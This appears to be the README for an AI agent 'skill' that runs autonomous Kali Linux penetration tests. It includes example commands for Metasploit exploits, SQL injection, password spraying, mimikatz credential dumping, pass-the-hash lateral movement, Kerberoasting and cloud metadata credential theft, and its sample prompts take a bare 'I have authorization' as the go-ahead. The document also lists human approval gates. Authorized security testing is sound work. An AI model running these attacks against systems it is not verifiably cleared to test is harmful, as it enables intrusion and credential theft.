kali-pentest-ai-agent
Skill by ara.so — Security Skills collection.
An AI agent skill for autonomous penetration testing using Kali Linux. Provides 269 CLI security tools across 14 categories, 15+ scenario playbooks, intelligent attack path planning, cross-phase result integration, and mandatory human approval for high-risk actions. Unlike traditional automated scanners, this skill enables AI agents to adaptively plan, execute, and iterate through penetration testing phases like a human security researcher.
What It Does
- Autonomous Attack Planning: AI agent analyzes targets and plans multi-phase attack paths
- Tool Selection & Execution: Intelligently selects from 269+ Kali tools based on context
- Cross-Phase Integration: Integrates findings across reconnaissance, scanning, exploitation, and post-exploitation
- Adaptive Strategy: Adjusts testing approach based on intermediate results
- Human Approval Gates: Requires explicit authorization before high-risk actions
- Depth Control: Supports Quick/Standard/Deep testing modes with coverage matrices
- Structured Reporting: Generates Markdown and HTML reports with evidence and remediation
Installation
1. Install the Skill
Copy the skill directory into your AI agent's skills folder:
# For Claude Code (personal)
cp -r kali-pentest ~/.claude/skills/
# For Claude Code (project-specific)
cp -r kali-pentest .claude/skills/
# For OpenClaw
cp -r kali-pentest ~/.openclaw/skills/
# For Hermes Agent
cp -r kali-pentest ~/.hermes/skills/2. Set Up Kali Environment
Choose one of three modes:
Local Mode (agent runs directly on Kali):
# Ensure you're on Kali Linux
cat /etc/os-release | grep Kali
# Verify tool availability
which nmap metasploit-framework burpsuiteServer Mode (SSH to remote Kali):
# Generate SSH key if needed
ssh-keygen -t ed25519 -f ~/.ssh/kali_key
# Copy public key to Kali server
ssh-copy-id -i ~/.ssh/kali_key.pub root@kali-server-ip
# Test connection
ssh -i ~/.ssh/kali_key root@kali-server-ip "uname -a"Docker Mode (containerized Kali):
# Pull Kali Docker image
docker pull kalilinux/kali-rolling
# Create persistent container
docker run -d --name kali-pentest \
--network host \
--cap-add=NET_ADMIN \
--cap-add=NET_RAW \
-v $(pwd)/kali-pentest:/workspace \
kalilinux/kali-rolling tail -f /dev/null
# Install base tools
docker exec kali-pentest bash -c "apt update && apt install -y kali-linux-default"3. Configure Environment Variables
# Set Kali connection mode
export KALI_MODE="local" # or "server" or "docker"
# For server mode
export KALI_SSH_KEY="$HOME/.ssh/kali_key"
export KALI_HOST="root@192.168.1.100"
# For docker mode
export KALI_CONTAINER="kali-pentest"
# Output directory for reports
export PENTEST_OUTPUT_DIR="$HOME/pentest-reports"
mkdir -p "$PENTEST_OUTPUT_DIR"Key Commands & Usage
Invoke via Slash Command
# In Claude Code or compatible agent
/kali-pentestInvoke via Natural Language
Quick Scan Example:
Kali tools are available locally (this machine is Kali).
Target: 10.0.0.0/24
Quickly scan the target network for open ports and services.
I have authorization.Standard Assessment Example:
The persistent Docker container `kali-pentest` is initialized.
Use Docker mode to run a web application penetration test against http://192.168.1.50.
I have authorization.Deep Assessment Example:
Kali server: ssh -i ~/.ssh/kali_key root@192.168.1.100
First run a full port scan against 192.168.1.50, then plan and execute
an in-depth penetration test — do not overlook any potential weakness.
I have authorization.Core Workflow
The agent executes five steps:
Step 1: Environment Setup
# Agent verifies Kali access
ssh -i ~/.ssh/kali_key root@kali-host "which nmap metasploit sqlmap"
# Or local mode
which nmap metasploit sqlmap
# Or docker mode
docker exec kali-pentest which nmap metasploit sqlmapStep 2: Planning
# Agent confirms authorization and scope
# Selects appropriate playbook from decision tree:
# - external-network.md
# - internal-network.md
# - web-application.md
# - active-directory.md
# - api-security.md
# - cloud-native.md
# - mobile-application.md
# - wireless-network.md
# - password-audit.md
# - source-code-audit.md
# - social-engineering.md
# - physical-security.md
# - voip-ics.md
# - post-exploitation.md
# - reporting.mdStep 3: Execute Phases
Reconnaissance:
# Host discovery
nmap -sn 192.168.1.0/24 -oN hosts.txt
# DNS enumeration
dig @8.8.8.8 example.com ANY +noall +answer
dnsenum --enum example.com
# Subdomain discovery
subfinder -d example.com -o subdomains.txtPort Scanning:
# Quick scan
nmap -T4 -F 192.168.1.50
# Full TCP scan with service detection
nmap -p- -sV -sC -O 192.168.1.50 -oA full-scan
# UDP scan for common services
nmap -sU --top-ports 100 192.168.1.50 -oN udp-scan.txtVulnerability Detection:
# Nmap vulnerability scripts
nmap --script vuln 192.168.1.50 -oN vuln-scan.txt
# Web vulnerability scanning
nikto -h http://192.168.1.50 -output nikto.txt
# SSL/TLS testing
sslscan --no-failed 192.168.1.50:443Exploitation:
# Metasploit Framework
msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; \
set RHOST 192.168.1.50; set LHOST 192.168.1.10; exploit"
# SQL injection
sqlmap -u "http://192.168.1.50/page?id=1" --dbs --batch
# Password spraying
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-successPost-Exploitation:
# Privilege escalation enumeration
linpeas.sh | tee linpeas-output.txt
# Credential dumping
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
# Lateral movement
crackmapexec smb 192.168.1.0/24 -u admin -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cStep 4: Analyze & Iterate
Agent integrates results across phases:
# Example: Agent logic (pseudocode)
if redis_noauth_found:
exploit_redis_for_shell()
if shell_obtained:
run_privilege_escalation_enum()
if credentials_found:
attempt_lateral_movement()Step 5: Report Generation
# Generate Markdown report
cat > report.md <<EOF
# Penetration Test Report
## Executive Summary
- Target: 192.168.1.50
- Date: $(date)
- Severity: Critical findings detected
## Findings
### [CRITICAL] Unauthenticated Redis Access
**Evidence**: \`\`\`redis-cli -h 192.168.1.50 INFO\`\`\`
**Impact**: Remote code execution via Redis module injection
**Remediation**: Enable authentication with \`requirepass\` directive
## Attack Chain
Redis no-auth → SSH shell → SUID privesc → root access
EOF
# Convert to HTML (agent uses reporting tools)
markdown report.md > report.htmlCommon Patterns
Pattern 1: Network Penetration Test
# Phase 1: Discovery
nmap -sn $TARGET_NETWORK -oG - | grep "Up" | cut -d' ' -f2 > live-hosts.txt
# Phase 2: Port scanning
while read host; do
nmap -p- -sV -sC "$host" -oN "scan-$host.txt"
done < live-hosts.txt
# Phase 3: Vulnerability assessment
for host in $(cat live-hosts.txt); do
nmap --script vuln "$host" -oN "vuln-$host.txt"
done
# Phase 4: Exploitation (with approval)
# Agent pauses here for human confirmation
msfconsole -r exploit-script.rcPattern 2: Web Application Test
# Passive reconnaissance
whatweb http://$TARGET
wafw00f http://$TARGET
# Active scanning
nikto -h http://$TARGET -output nikto.html -Format html
zap-cli quick-scan --self-contained http://$TARGET
# Targeted exploitation
sqlmap -u "http://$TARGET/page?id=1" --risk 3 --level 5 --batch
wpscan --url http://$TARGET --enumerate vp,vt,uPattern 3: Active Directory Assessment
# Initial enumeration
crackmapexec smb $DC_IP -u '' -p '' --shares
ldapsearch -x -h $DC_IP -b "DC=corp,DC=example,DC=com"
# Kerberoasting
impacket-GetUserSPNs corp.example.com/user:password -dc-ip $DC_IP -request
# Bloodhound collection
bloodhound-python -d corp.example.com -u user -p password -ns $DC_IP -c all
# Post-exploitation
impacket-secretsdump corp.example.com/admin@$DC_IPPattern 4: Cloud-Native Security
# Kubernetes enumeration
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces -o json | grep -i password
# Container escape detection
amicontained
# Cloud metadata access
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/Configuration
Depth Settings
Control testing thoroughness via natural language:
| Trigger Phrase | Depth | Coverage |
|---|---|---|
| "quick scan", "fast check" | Quick | Top 100 ports, common vulnerabilities |
| (default) | Standard | Full TCP, service fingerprinting, OWASP Top 10 |
| "comprehensive", "deep", "thorough" | Deep | All ports, exhaustive vulnerability checks, manual verification |
Approval Gates
High-risk actions require explicit human confirmation:
- Exploitation attempts (RCE, privilege escalation)
- Credential dumping
- Lateral movement
- Service disruption (DoS tests)
- Data exfiltration
Agent will pause and request approval:
🔴 HIGH-RISK ACTION REQUIRES APPROVAL:
Execute Metasploit exploit against 192.168.1.50 (RCE attempt)
Type 'APPROVE' to proceed or 'DENY' to skip:Troubleshooting
Connection Issues
# Test SSH connection
ssh -i $KALI_SSH_KEY -v $KALI_HOST "echo 'Connection OK'"
# Test Docker connection
docker exec $KALI_CONTAINER echo "Container OK"
# Check network connectivity from Kali
ssh -i $KALI_SSH_KEY $KALI_HOST "ping -c 3 $TARGET_IP"Tool Not Found
# Install missing tool (server mode)
ssh -i $KALI_SSH_KEY $KALI_HOST "apt update && apt install -y <tool-name>"
# Install in Docker
docker exec $KALI_CONTAINER bash -c "apt update && apt install -y <tool-name>"Permission Errors
# Grant NET_ADMIN capability (Docker)
docker run --cap-add=NET_ADMIN --cap-add=NET_RAW ...
# Run as root (server mode)
ssh -i $KALI_SSH_KEY root@$KALI_HOST
# Check sudo privileges
ssh -i $KALI_SSH_KEY $KALI_HOST "sudo -l"Output Collection Failures
# Ensure output directory exists
mkdir -p $PENTEST_OUTPUT_DIR
# Check disk space
df -h $PENTEST_OUTPUT_DIR
# Verify write permissions
touch $PENTEST_OUTPUT_DIR/test && rm $PENTEST_OUTPUT_DIR/testAgent Stops Early
If coverage is insufficient:
The current pentest results are not comprehensive enough.
Check the playbook's "Stop When" conditions and coverage matrix.
Have all required tool categories been utilized?Real-World Examples
Example 1: External Network Pentest
# Reconnaissance
amass enum -d target.com -o subdomains.txt
nmap -iL subdomains.txt -p 80,443,8080,8443 -oA web-services
# Vulnerability scanning
nuclei -l web-services.txt -t cves/ -o nuclei-findings.txt
# Exploitation (approved)
msfconsole -x "use exploit/multi/http/apache_log4j_rce; set RHOST 10.0.0.50; exploit"
# Report
cat nuclei-findings.txt web-services.nmap > final-report.mdExample 2: Internal Network Compromise
# Initial foothold via phishing (simulated)
# Now on internal network: 172.16.0.0/16
# Host discovery
netdiscover -r 172.16.0.0/16 -P
# Lateral movement
crackmapexec smb 172.16.0.0/16 -u admin -H $NTLM_HASH --sam
# Domain enumeration
bloodhound-python -d corp.local -u admin -p $PASSWORD -c all -ns 172.16.0.10
# Domain admin compromise
impacket-psexec corp.local/dadmin@172.16.0.10 -hashes :$DA_HASHExample 3: API Security Assessment
# Parse OpenAPI spec
cat openapi.yaml | grep -E "paths:|/api/"
# Automated fuzzing
ffuf -w /usr/share/wordlists/api-endpoints.txt \
-u https://api.target.com/FUZZ \
-H "Authorization: Bearer $API_TOKEN"
# Authentication bypass testing
sqlmap -u "https://api.target.com/user?id=1" \
-H "Authorization: Bearer $API_TOKEN" \
--batch --level 5Documentation References
- Official Kali Docs: https://www.kali.org/docs/
- Playbooks:
kali-pentest/references/playbooks/ - Tool Categories:
kali-pentest/references/<category>/ - Environment Setup:
kali-pentest/references/environment/
Tested Models
Optimized for:
claude-opus-4.6claude-sonnet-4.6deepseek-v4-proqwen3.6:27b(local, requires ≥128K context)
Legal & Ethical Use
⚠️ AUTHORIZATION REQUIRED: This skill is for authorized penetration testing only. Always obtain explicit written permission before testing any target. Unauthorized access to computer systems is illegal under CFAA (US), Computer Misuse Act (UK), and similar laws worldwide.